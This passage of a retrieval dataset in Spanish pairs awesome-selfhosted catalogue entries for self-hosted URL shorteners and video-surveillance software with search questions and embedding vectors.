-0.08758, -0.04114, 0.10436, 0.03555, 0.00332, -0.03885, -0.0702, 0.00073, -0.00526, -0.06562, 0.03266, 0.00454, -0.04044, 0.02267, 0.09127, 0.12757, -0.0034, 0.12762, 0.0244, -0.08263, 0.02286, -0.01379, 0.0287, -0.04328, 0.07233, -0.00499, -0.08117, 0.02698, 0.10051, 0.02905, -0.00255, -0.06536, -0.03556, 0.03351, -0.05238, -0.04208, 0.05585, -0.07047, -0.07027, -0.02241, 0.07352, 0.05813, -0.00636, -0.03873, -0.0544, -0.00832, -0.08875, 0.01055, -0.01268, 0.01186, 0.08199, 0.08022, 0.00011, -0.01729, 0.02104, 0.11781, 0.06201, -0.01367, 0.00458, 0.00815, 0.00659, -0.02024, 0.0242, 0.08397, 0.06671, 0.06717, -0.00024, 0.00183, -0.01012, 0.04411, -0.01765, -0.09023, -0.01055, 0.06236, 0.0223, 0.02345, -0.05284, -0.06805, 0.00412, -0.03647, 0.01335, -0.02844, -0.02222, 0.01677, 0.01599, -0.02605, -0.06382, 0.03382, 0.03989, -0.06627, -0.06137, -0.01173, -0.02112, -0.04476, 0.00566, 0.02712, -0.00631, 0.02417, 0.0148, -0.0573, 0.03726, 0.05537]} -{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: bit β€” Fast, lightweight, resource-efficient, compiled URL shortener [MIT, Docker/Crystal]. Chhoto URL β€” Simple, lightning-fast URL shortener with no bloat (fork of simply-shorten) [MIT, Rust/Docker]. clink β€” A super-minimal link shortening service written in pure C, focusing on small executable size, portability, and ease of configuration [AGPL-3.0, C]. Flink β€” Create QR Codes, embeddable link previews for your website and crawls/scrapes metadata [MIT, Docker]. Kutt β€” Modern URL shortener with support for custom domains and custom URLs [MIT, Nodejs/Docker]. rs-short β€” Lightweight link shortener written in Rust, with features such as caching, spambot protection and phishing detection [MPL-2.0, Rust]. Shlink β€” URL shortener with REST API and command line interface. Includes official progressive web application and docker images [MIT, PHP/Docker]. Simple-URL-Shortener β€” KISS URL shortener, public or private (with account). Minimalist and lightweight. No dependencies [MIT, PHP].", "indexar": "con que puedo crear cΓ³digos QR y enlaces rΓ‘pidos de forma ligera", "v": [0.20287, -0.03173, -0.08959, -0.0374, 0.07259, -0.1877, 0.0608, 0.17404, -0.06603, -0.21018, -0.00611, -0.13287, 0.0037, -0.15692, 0.15494, 0.01299, 0.03025, -0.00292, -0.02633, -0.03026, 0.07575, -0.06295, -0.09827, -0.10724, -0.04897, -0.11376, 0.09626, 0.0166, -0.10333, -0.02365, -0.09336, 0.1075, 0.06631, 0.12506, -0.07844, 0.09066, 0.14627, 0.16586, -0.01855, 0.00767, -0.03486, 0.10161, -0.00285, -0.01395, -0.03521, 0.03985, -0.03746, 0.05417, 0.05384, -0.02016, -0.04025, 0.04676, -0.18539, -0.09656, -0.11278, -0.08327, 0.17103, -0.05921, -0.05599, 0.03353, 0.02668, 0.00769, 0.025, -0.07193, -0.0397, -0.01976, 0.05033, -0.01616, -0.09109, -0.05217, -0.07739, 0.02559, -0.05529, -0.02738, 0.04554, 0.1162, -0.1052, -0.05266, 0.03667, 0.11624, 0.04636, -0.06198, 0.00059, -0.07475, -0.01918, -0.01783, -0.07072, -0.05851, -0.06469, -0.13455, 0.08591, 0.04654, 0.05479, 0.0481, -0.09571, 0.02704, -0.03761, 0.08322, 0.07357, 0.04985, -0.03808, -0.03616, -0.08134, 0.08717, 0.06523, 0.05049, 0.05345, -0.0481, 0.07117, 0.00502, 0.04346, -0.09828, -0.05227, -0.0696, -0.02757, 0.05449, 0.01105, -0.0305, -0.06648, -0.03708, -0.02122, -0.05795, -0.05987, 0.03184, -0.05045, 0.02979, 0.03081, 0.05019, 0.00179, -0.01985, -0.06194, 0.03927, -0.04732, -0.03744, -0.01438, 0.06443, 0.02706, 0.04318, 0.02757, -0.00052, 0.03193, -0.00485, 0.02326, 0.01989, -0.02445, 0.01004, 0.00135, -0.05528, -0.10616, 0.01871, -0.00757, 0.02535, -0.09526, -0.02974, -0.08154, -0.04815, -0.02704, -0.0041, -0.00982, 0.05778, -0.04587, 0.10123, -0.03754, 0.01215, -0.00685, -0.00934, -0.00116, -0.0215, 0.04753, 0.0087, -0.03197, 0.02452, 0.00255, -0.03205, 0.08729, -0.03701, -0.03086, 0.01657, 0.00754, -0.08401, -0.07942, 0.03698, 0.00793, 0.01064, -0.01766, -0.07385, 0.09755, 0.03169, 0.01066, 0.01632, 0.04213, 0.05495, -0.01135, 0.04395, -0.0177, -0.0041, 0.02218, -0.03178, 0.0276, -0.0708, -0.0126, -0.02036, 0.02351, -0.07944, 0.0168, 0.02264, -0.02805, 0.05135, -0.04736, 0.04212, 0.04211, -0.0766, 0.07469, -0.02776, -0.0317, 0.00814, -0.02444, -0.0052, 0.04422, -0.03512, 0.03908, 0.01494, 0.01332, 0.0161, 0.02215, 0.02454, 0.00266, 0.06011, 0.01611, 0.0088, 0.00435, -0.05011, -0.04078, -0.0546, 0.04603, 0.04985, -0.02459, 0.00765, -0.07107, -0.00519, 0.05011, 0.02654, -0.00978, -0.03352, 0.01935, -0.01506, -0.05877, -0.02588, -0.01885, -0.08803, 0.00173, -0.0049, 0.07362, -0.04015, 0.01853, -0.0291]} -{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: YOURLS β€” YOURLS is a set of PHP scripts that will allow you to run Your Own URL Shortener. Features include password protection, URL customization, bookmarklets, statistics, API, plugins, jsonp [MIT, PHP].", "indexar": "que programa hay para crear un abreviador de enlaces propio", "v": [0.01232, 0.07352, -0.11982, -0.12377, 0.09474, -0.05524, 0.08972, -0.07821, -0.15808, -0.20451, 0.02395, -0.14139, -0.0726, -0.17249, 0.08968, 0.09007, 0.13196, -0.20596, 0.07655, 0.08534, 0.02532, 0.08589, -0.02284, -0.05889, 0.00259, -0.15283, 0.07534, -0.03188, -0.0703, 0.04423, -0.02149, 0.12045, 0.03042, -0.04189, 0.03479, -0.05195, 0.09684, 0.02708, 0.00911, 0.02251, 0.00175, -0.08884, -0.07565, 0.10316, -0.09265, 0.04843, 0.09157, -0.06819, 0.0096, -0.00302, 0.04218, 0.00771, -0.07366, -0.04455, 0.0321, -0.08436, 0.00523, -0.15405, -0.04099, 0.00139, 0.00368, 0.07721, 0.05104, -0.07541, -0.02947, -0.04937, 0.04294, 0.01071, -0.09519, 0.04471, -0.09207, -0.05206, 0.00804, 0.01429, -0.0207, 0.12714, -0.02082, -0.02668, 0.02392, -0.03079, -0.02745, -0.04472, 0.09363, -0.01232, -0.08727, 0.02871, 0.05753, 0.0319, -0.05763, -0.07621, 0.03455, 0.12951, 0.02185, 0.07288, -0.03715, -0.07631, 0.08233, 0.0557, 0.0603, 0.13155, 0.01744, -0.07282, -0.02466, 0.10373, -0.02182, 0.0722, 0.13609, -0.06404, -0.02235, 0.03581, 0.01899, -0.03389, 0.03075, -0.07812, -0.08987, 0.02544, -0.01335, -0.03831, 0.07294, -0.08696, -0.08126, -0.03722, -0.07689, 0.05793, -0.09535, -0.02954, 0.00765, 0.05776, -0.03208, 0.0837, -0.01412, 0.03119, -0.02655, -0.10161, -0.05458, -0.0342, 0.00017, -0.02144, -0.0046, -0.10718, 0.01061, 0.07028, 0.04215, -0.02915, 0.01287, -0.00681, -0.04215, -0.09631, -0.0447, 0.04808, -0.01383, 0.06933, -0.01488, 0.00079, -0.0694, -0.01773, -0.01275, -0.01969, 0.04774, 0.07947, -0.03231, 0.06217, -0.04453, -0.06605, 0.06443, 0.01745, -0.04553, 0.00871, 0.09701, 0.06273, -0.03988, 0.10764, 0.00981, -0.06941, 0.01029, -0.05382, -0.0119, -0.08692, 0.05446, -0.03675, -0.08538, -0.02679, 0.02544, 0.03228, -0.06622, -0.07983, 0.02345, 0.01878, 0.01551, 0.01142, -0.02531, -0.02056, -0.04731, 0.04543, 0.02945, -0.00961, -0.01429, -0.01897, 0.07651, -0.01808, -0.03216, -0.02033, 0.0494, -0.03138, -0.01382, 0.08651, -0.03857, -0.00492, 0.01565, 0.11042, 0.06161, -0.0762, 0.05299, -0.00459, -0.03893, -0.00598, 0.01314, -0.00029, 0.07508, 0.02055, 0.02639, 0.03247, 0.0403, 0.02856, 0.00484, -0.04632, 0.01909, 0.04782, 0.02131, 0.00344, -0.00384, -0.11798, -0.03082, -0.08774, -0.00215, 0.01258, 0.04127, 0.02663, 0.00904, -0.0153, 0.00316, 0.07465, -0.01878, -0.08081, -0.00306, 0.00766, -0.02397, 0.02359, 0.03999, -0.05665, -0.0235, 0.03733, 0.00714, -0.07155, 0.05187, 0.01901]} -{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: YOURLS β€” YOURLS is a set of PHP scripts that will allow you to run Your Own URL Shortener. Features include password protection, URL customization, bookmarklets, statistics, API, plugins, jsonp [MIT, PHP].", "indexar": "cual es una alternativa libre a los servicios de URLs cortas", "v": [0.03859, 0.00226, -0.05681, 0.05656, -0.10228, -0.0905, 0.00145, -0.04979, -0.12, -0.01696, -0.17233, -0.29634, 0.04355, -0.01313, 0.07734, -0.17198, 0.08381, -0.09516, 0.17849, 0.00384, -0.08872, -0.03973, -0.09047, -0.02651, -0.16083, -0.11648, 0.06799, -0.03327, -0.08497, 0.06714, 0.06031, -0.02921, -0.00029, 0.01409, -0.07184, 0.06364, 0.13896, 0.11471, 0.13969, -0.09666, 0.0105, -0.10735, -0.01801, 0.05577, -0.01916, -0.08534, -0.09466, 0.01739, 0.02479, 0.05366, -0.00731, -0.06517, -0.12247, 0.01236, -0.01438, 0.00201, 0.07542, -0.11904, -0.14695, -0.0268, -0.04793, 0.01751, 0.00278, 0.01465, 0.06373, -0.01329, -0.05723, -0.02394, -0.03422, 0.04248, 0.06719, -0.02874, 0.06381, -0.07605, -0.12515, 0.02999, -0.10792, -0.01201, -0.04871, 0.09355, 0.06939, -0.04153, -0.02547, 0.08172, -0.05557, 0.00468, -0.00339, -0.08285, 0.02333, -0.01238, 0.07215, 0.05539, -0.00897, 0.10856, -0.10658, -0.00618, -0.02114, 0.0645, 0.06178, 0.03103, 0.06142, 0.06966, -0.11771, 0.05353, 0.06821, 0.00783, -0.02133, 0.04603, -0.09058, 0.06741, 0.00927, 0.08175, -0.00961, 0.01016, -0.03744, -0.04845, -0.11161, -0.02057, -0.03125, -0.03654, -0.00221, -0.0797, -0.02933, -0.04595, -0.01231, 0.08304, 0.03526, -0.02124, -0.02209, -0.00042, 0.0669, -0.03546, -0.07468, -0.118, -0.03146, -0.07606, 0.12697, -0.05999, 0.04187, 0.02545, -0.00761, -0.03885, -0.01936, 0.03542, 0.04954, -0.05584, -0.01895, 0.01808, 0.00289, 0.00936, -0.09139, 0.04931, -0.03413, 0.06262, -0.06702, 0.02323, -0.06627, -0.05099, -0.03652, 0.13131, 0.02674, -0.01181, 0.05845, -0.00645, 0.0084, 0.00467, 0.01847, -0.02558, -0.03497, 0.03363, 0.01631, 0.12727, -0.00081, -0.1064, 0.03518, -0.02285, -0.03398, -0.0606, 0.0538, 0.00876, 0.0212, -0.02095, -0.09664, -0.00717, -0.01055, -0.05622, 0.02282, -0.00472, 0.00472, -0.01887, -0.02882, -0.03679, -0.08729, -0.02835, 0.01379, 0.05281, 0.00046, -0.08137, -0.07682, -0.03288, -0.08943, -0.00922, -0.03573, -0.01888, -0.02662, -0.01774, 0.01319, 0.00049, -0.03291, 0.06883, 0.03988, 0.03737, 0.09681, -0.00791, -0.05667, -0.01851, 0.02263, -0.04311, 0.00713, 0.00427, -0.01025, -0.02514, -0.03098, 0.00377, 0.01892, 0.00681, 0.06949, 0.05177, -0.04221, -0.00789, 0.01848, -0.02015, -0.04216, 0.02674, 0.02113, -0.06441, 0.02131, 0.00718, 0.01039, -0.00039, 0.05178, 0.06113, -0.03791, 0.00724, 0.01614, -0.00012, -0.0963, -0.04791, -0.04541, -0.0455, -0.02378, -0.00604, 0.01498, 0.01002, 0.06736, 0.01429]} -{"tipo": "pregunta", "herramienta": "URL Shorteners", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / URL Shorteners", "tema": "url shorteners", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / URL Shorteners: YOURLS β€” YOURLS is a set of PHP scripts that will allow you to run Your Own URL Shortener. Features include password protection, URL customization, bookmarklets, statistics, API, plugins, jsonp [MIT, PHP].", "indexar": "con que puedo montar mi propio sistema de acortamiento de enlaces", "v": [0.00126, 0.15642, -0.13001, -0.14243, -0.00366, 0.05711, 0.02862, -0.04963, -0.26306, -0.12806, -0.05625, -0.0279, 0.05952, -0.08358, 0.17842, 0.09362, 0.09405, -0.17634, -0.04586, -0.00565, -0.04822, -0.15223, -0.0491, -0.03376, -0.04485, 0.01992, 0.13639, -0.0106, -0.12617, -0.00812, -0.03883, 0.1408, 0.03845, 0.02121, -0.01684, -0.12043, 0.04701, 0.02177, 0.07974, -0.08222, -0.06272, -0.06373, -0.06956, 0.053, -0.04994, -0.01047, -0.00321, -0.1244, -0.05053, -0.07875, 0.02227, -0.09102, -0.10764, -0.03128, -0.07757, -0.07786, 0.15508, -0.00408, 0.09407, -0.01386, -0.00187, 0.09636, -0.01741, 0.05017, 0.06263, -0.00951, -0.03907, 0.01418, -0.12095, -0.0113, -0.0682, -0.07236, 0.02781, 0.00373, -0.02627, 0.10468, 0.12468, 0.01452, 0.10236, 0.03667, -0.07274, 0.00079, 0.01781, 0.07705, -0.02194, 0.04114, -0.0416, -0.04846, 0.00231, -0.05923, 0.02938, 0.03264, 0.05122, 0.03456, -0.03523, -0.14595, -0.01129, 0.12922, 0.00664, 0.01239, -0.01749, 0.05713, 0.00645, 0.13348, 0.0225, -0.09593, 0.11966, -0.04575, 0.07405, -0.0542, 0.02603, 0.02501, -0.06413, -0.09969, -0.10613, -0.05697, -0.02597, 0.01098, -0.0322, -0.0309, -0.04714, -0.00211, 0.01034, -0.02326, -0.02683, -0.0209, 0.08608, 0.09818, 0.00852, 0.01877, 0.00113, 0.0252, -0.05769, -0.10942, 0.02482, -0.00511, -0.03399, 0.03226, 0.02241, -0.0293, -0.00176, 0.02213, -0.00572, -0.10986, 0.01711, 0.00136, 0.03721, -0.10893, -0.03159, -0.07261, -0.02581, 0.12172, -0.0091, -0.04105, -0.03771, -0.02423, 0.03534, -0.02931, 0.07707, 0.02691, 0.01719, 0.08084, -0.0039, 0.01931, -0.0036, 0.07927, -0.0144, -0.01559, 0.03796, 0.04672, -0.06033, 0.09207, -0.00365, -0.00265, 0.07909, -0.02808, -0.05181, -0.06158, 0.0263, 0.03861, -0.05702, 0.01572, -0.02345, 0.04072, -0.04662, -0.00539, 0.04136, 0.04922, 0.03949, 0.00755, 0.02671, -0.02862, -0.00833, 0.06131, 0.03792, -0.02867, -0.05184, -0.03994, 0.01937, 0.01986, -0.01858, 0.01453, 0.06022, -0.05205, -0.00211, 0.01804, 0.03929, 0.01942, 0.03265, 0.05783, 0.06741, -0.00619, 0.08726, -0.05849, -0.09685, 0.00872, 0.01727, -0.00204, -0.01152, 0.01564, 0.04383, 0.03953, 0.05007, 0.05379, 0.01189, 0.00285, -0.03378, 0.02857, -0.01271, 0.01006, -0.00997, -0.06506, -0.04295, -0.07021, -0.00535, -0.02925, 0.00378, 0.00766, -0.02938, 0.00797, 0.08142, 0.08069, 0.02916, -0.0689, -0.01407, -0.06245, -0.05885, -0.01079, 0.04207, -0.08863, -0.02799, 0.01984, -0.02023, -0.08422, -0.01042, -0.00623]} -{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "que programa hay para vigilar las cΓ‘maras de seguridad con IA local?", "v": [0.18987, 0.02493, -0.0776, -0.13003, -0.02061, -0.15548, -0.00551, -0.00388, 0.05782, -0.0771, 0.06973, -0.09244, -0.02973, -0.02595, 0.03953, 0.10874, 0.0317, -0.05617, 0.06813, 0.0745, 0.01614, 0.10552, -0.01405, -0.0242, -0.01979, 0.06104, -0.03325, -0.05525, -0.0861, -0.09626, 0.01502, -0.02946, 0.0846, -0.04025, -0.07085, -0.11542, 0.06962, -0.09189, 0.01798, 0.0289, 0.0417, -0.03037, 0.07767, -0.06141, 0.15135, 0.0024, 0.00287, -0.05825, 0.1013, -0.07079, -0.13667, 0.02109, 0.0846, -0.01647, 0.01266, -0.0341, -0.03544, 0.00748, -0.00462, -0.09333, -0.08848, 0.03597, 0.06414, 0.06953, 0.0007, 0.06998, 0.04179, 0.00313, -0.08602, -0.06411, -0.02314, -0.05403, 0.02119, 0.13337, -0.07231, -0.12074, -0.03975, -0.06681, 0.0325, -0.04169, -0.1044, 0.0269, -0.01853, 0.08494, -0.12828, -0.06974, -0.04571, -0.0536, -0.11736, -0.01266, 0.07527, 0.11636, 0.08805, -0.00735, 0.10408, -0.0156, 0.16128, 0.07615, -0.05459, 0.04167, 0.11139, -0.17041, -0.07308, 0.08357, -0.00324, 0.02242, 0.01634, 0.05304, -0.02497, -0.01691, 0.00272, 0.0726, -0.07203, -0.04201, -0.1116, 0.01783, 0.01635, -0.06211, 0.10921, 0.00126, 0.01115, -0.01656, -0.09011, -0.07608, 0.1221, -0.02573, -0.05955, 0.06148, -0.07009, 0.02746, -0.01135, -0.07672, -0.0264, -0.00886, 0.00246, -0.02323, 0.00994, -0.06223, -0.08146, 0.0142, -0.01002, -0.01555, 0.05736, -0.03598, 0.07375, 0.06598, -0.05678, 0.01164, -0.07811, 0.09536, 0.00171, 0.03808, -0.08064, 0.00574, -0.04626, 0.08611, 0.04688, -0.06837, -0.01367, 0.0512, 0.05726, -0.02721, 0.05191, -0.06604, 0.05699, -0.05465, 0.00871, -0.00523, 0.07008, 0.00807, -0.01866, 0.02025, 0.00886, -0.03912, 0.00234, -0.06202, 0.03491, -0.12362, 0.04669, -0.09769, -0.0676, 0.08855, 0.06352, 0.1076, 0.07036, -0.03753, -0.01924, 0.07374, 0.01709, 0.0205, 0.0349, -0.03086, -0.03108, 0.00515, 0.00308, -0.06484, -0.02459, -0.02139, 0.00981, 0.03406, -0.05485, 0.01312, 0.00544, -0.0247, 0.07725, 0.06026, -0.01129, 0.0217, 0.03383, -0.00254, -0.02063, 0.03437, 0.01256, -0.01204, -0.03986, -0.03174, 0.0676, 0.0648, -0.05571, 0.01743, 0.06929, -0.02707, -0.00466, 0.06414, -0.05494, -0.06985, -0.03932, 0.07357, 0.05073, -0.07079, -0.02982, -0.02731, -0.11257, -0.03702, 0.01146, -0.05299, -0.03785, -0.00685, 0.02625, -0.11477, -0.04455, 0.03811, -0.02989, -0.0813, -0.09766, -0.03189, -0.07319, 0.05584, 0.05207, -0.0754, 0.01398, 0.04676, 0.01753, -0.02932, 0.05296, -0.02253]} -{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "con quΓ© puedo montar un sistema de videovigilancia en casa que sea gratuito y privado?", "v": [-0.18042, 0.05423, -0.04976, -0.08099, -0.0527, -0.00586, -0.04237, -0.06488, -0.05366, -0.26567, -0.00973, -0.14144, 0.04846, -0.02139, -0.0003, 0.08281, 0.04022, -0.08886, 0.03837, 0.07505, 0.01027, -0.09286, -0.00711, -0.12034, 0.00159, 0.05508, 0.12927, -0.03072, -0.13263, 0.03414, 0.04057, 0.03454, 0.01077, -0.03037, -0.04102, -0.04352, 0.0605, -0.00711, 0.00797, -0.02196, 0.01628, -0.02378, 0.01851, 0.00948, 0.07822, -0.10567, -0.01654, -0.02889, -0.09116, -0.02786, -0.08517, -0.02785, -0.01519, 0.03704, 0.05954, -0.02664, 0.09303, -0.11443, 0.14013, 0.00159, -0.0614, 0.09377, 0.0923, 0.08719, 0.04176, 0.00989, -0.02668, 0.04693, -0.08101, -0.02683, -0.04239, -0.10437, 0.03867, 0.05882, -0.06785, 0.02175, -0.06193, -0.07286, 0.03236, -0.00107, 0.00073, -0.04456, -0.01566, 0.04945, -0.01877, 0.0354, -0.06264, -0.0682, 0.03851, -0.10425, 0.08756, 0.05518, 0.08146, 0.05191, -0.00559, -0.06242, 0.10087, 0.12256, 0.0054, -0.07694, 0.03694, -0.03424, -0.07834, 0.19608, 0.09587, -0.01434, 0.06473, -0.04505, 0.00724, -0.09918, -0.03302, 0.04545, -0.10811, -0.0018, -0.06765, -0.07934, -0.10308, -0.00199, 0.02218, 0.01923, -0.05565, -0.0077, 0.00137, -0.06265, -0.03779, -0.02664, 0.02416, 0.1161, -0.03968, 0.08216, 0.06047, 0.00015, -0.10459, -0.03761, 0.06765, -0.01788, -0.07078, -0.02197, -0.08443, -0.02675, 0.02728, 0.07431, 0.01783, -0.10733, 0.06284, -0.01557, 0.0353, -0.07486, -0.06383, 0.01707, -0.04245, 0.13818, -0.0438, -0.02175, 0.01599, 0.02599, 0.05009, -0.06669, -0.00128, 0.05172, 0.03026, 0.05151, -0.02794, -0.05688, -0.04985, 0.04121, -0.01061, -0.03305, 0.01393, 0.03964, -0.01717, 0.05812, -0.02877, -0.08168, -0.00197, -0.06895, -0.00675, -0.09267, -0.03451, -0.07796, -0.05959, 0.06744, -0.0412, 0.00303, -0.06722, -0.00167, -0.01689, 0.03951, 0.03475, 0.05805, 0.00704, 0.00863, -0.06452, 0.04188, -0.00913, -0.07266, -0.12222, -0.08719, 0.05489, 0.05495, -0.05057, -0.06886, 0.04499, -0.03935, -0.04168, 0.00444, 0.03655, 0.06096, 0.06463, 0.07386, 0.00337, 0.0349, 0.03659, -0.04488, -0.00933, 0.09783, 0.03675, -0.01107, -0.03203, 0.05253, 0.10938, 0.06634, 0.01778, -0.06255, -0.00022, 0.02699, 0.02752, 0.071, 0.01093, 0.05617, -0.07589, -0.03395, -0.0426, -0.03825, 0.04137, 0.00179, 0.03416, 0.00912, -0.02566, -0.03198, 0.07217, 0.12681, -0.00077, -0.0122, -0.06356, -0.12825, -0.08391, 0.03649, 0.06837, -0.1006, -0.03334, 0.03272, -0.01716, -0.03443, -0.0175, -0.03115]} -{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Bluecherry β€” Closed-circuit television (CCTV) software application which supports IP and Analog cameras [GPL-2.0, PHP]. Frigate β€” Monitor your security cameras with locally processed AI [MIT, Docker/Python/Nodejs]. motionEye β€” Online interface for the software Motion, a video surveillance program with motion detection [GPL-3.0, Python/Docker]. Secluso β€” Private DIY home security camera system for Raspberry Pi, with end-to-end encrypted remote access and mobile apps for live video, alerts, and recording playback [GPL-3.0, Rust]. SentryShot β€” Video surveillance management system [GPL-2.0, Docker/Rust]. Strix β€” Auto-discovers working stream URLs for IP cameras and generates ready-to-use Frigate and go2rtc configs [MIT, Go/Docker]. Viseron β€” Self-hosted, local-only NVR and AI Computer Vision software. With features such as object detection, motion detection, face recognition and more, it gives you the power to keep an eye on your home, office or any other place you want to monitor [MIT, Docker].", "indexar": "cual es una alternativa libre a los sistemas NVR comerciales para detectar movimiento?", "v": [-0.0944, -0.00102, -0.1586, -0.20421, -0.1137, 0.01363, -0.04642, 0.03065, -0.1063, -0.09663, -0.00874, -0.22758, -0.0206, -0.04356, 0.17919, 0.03249, 0.02937, -0.1802, 0.09666, 0.02728, -0.08362, -0.11639, 0.00453, -0.03748, -0.01355, 0.06095, -0.08831, -0.09807, -0.09825, 0.0664, 0.01633, -0.05153, 0.16362, -0.08163, -0.03841, -0.10983, 0.04664, -0.0094, 0.06647, -0.057, 0.0514, -0.03495, -0.011, -0.0196, 0.06351, -0.02889, -0.07279, -0.07307, -0.06604, -0.03887, 0.01332, 0.11396, -0.14233, -0.04337, 0.09141, -0.03433, 0.04523, 0.05175, 0.03138, -0.11191, 0.01494, 0.0491, 0.05565, -0.08362, 0.05216, -0.0721, 0.00143, -0.07815, -0.08377, -0.04779, 0.00106, -0.0461, 0.00909, 0.07898, -0.01946, 0.12633, 0.0646, -0.01119, -0.00553, 0.0629, 0.04388, -0.0276, -0.09545, 0.09375, -0.01646, -0.13632, 0.03823, -0.08413, 0.01431, -0.02631, 0.08688, 0.07408, -0.06199, 0.08325, 0.12575, -0.00714, -0.07173, 0.02336, -0.02709, 0.1243, 0.05548, 0.02135, -0.15652, 0.00301, -0.01937, -0.07083, 0.00692, 0.0146, -0.01432, -0.06449, -0.0014, 0.01037, -0.00438, -0.04352, -0.01433, 0.01997, -0.02794, 0.03345, -0.0734, 0.09, -0.05792, -0.00347, -0.0256, -0.08568, 0.02637, -0.02177, 0.02397, 0.0717, -0.00945, 0.02595, 0.06988, -0.01537, -0.04516, -0.07421, -0.04851, 0.00295, 0.05966, 0.03019, 0.0501, 0.01569, 0.02893, 0.02617, 0.02278, -0.0283, 0.07261, 0.04925, 0.03108, -0.05255, -0.01716, 0.02905, -0.03143, 0.00394, -0.06784, 0.01846, -0.01543, 0.00788, -0.00899, -0.05132, -0.06233, 0.03133, 0.01757, 0.07607, -0.02913, -0.00277, 0.00048, -0.03144, -0.04166, -0.02008, 0.05481, 0.02551, -0.00694, 0.03052, 0.06847, -0.07285, 0.08012, -0.02802, -0.02805, -0.06325, 0.10884, -0.06641, -0.08567, 0.05497, -0.01889, -0.05598, 0.00352, -0.02966, 0.00426, -0.01681, 0.02479, 0.08272, 0.03515, 0.04032, -0.0744, -0.08445, -0.03883, -0.05738, -0.02318, -0.08774, -0.0019, 0.03824, -0.10597, -0.03218, 0.01034, -0.00767, -0.01891, 0.04782, 0.00759, 0.0925, 0.07742, 0.00595, 0.02376, -0.02283, 0.07017, -0.01747, -0.1135, 0.01522, -0.015, 0.00051, -0.01291, -0.03842, 0.04796, 0.03944, 0.04554, 0.02595, -0.03507, -0.04917, 0.02275, 0.09492, 0.01162, -0.00773, -0.00245, 0.04028, 0.0214, 0.00495, 0.02672, 0.02609, 0.04033, -0.00231, -0.03373, -0.05261, 0.06744, 0.07108, -0.09047, -0.07577, -0.01197, -0.05173, -0.07405, 0.02514, -0.00859, -0.09524, -0.0076, 0.05063, 0.03611, -0.06313, 0.09634, 0.01398]} -{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Zoneminder β€” Closed-circuit television (CCTV) software application which supports IP, USB and Analog cameras [GPL-2.0, PHP/deb].", "indexar": "que programa hay para grabar cΓ‘maras de seguridad analΓ³gicas o por IP en casa?", "v": [0.13714, -0.00141, -0.05675, -0.11236, 0.00774, -0.18641, 0.00581, 0.01096, -0.02696, -0.02551, 0.07194, -0.07456, -0.02316, -0.03972, 0.02871, 0.11422, -0.02438, -0.01227, -0.00339, 0.0143, -0.04232, 0.17013, -0.01286, -0.08521, -0.04048, 0.01658, 0.01773, 0.01233, -0.10651, -0.0584, -0.0016, -0.02906, 0.03232, -0.0881, -0.16053, -0.15151, 0.07209, -0.08094, 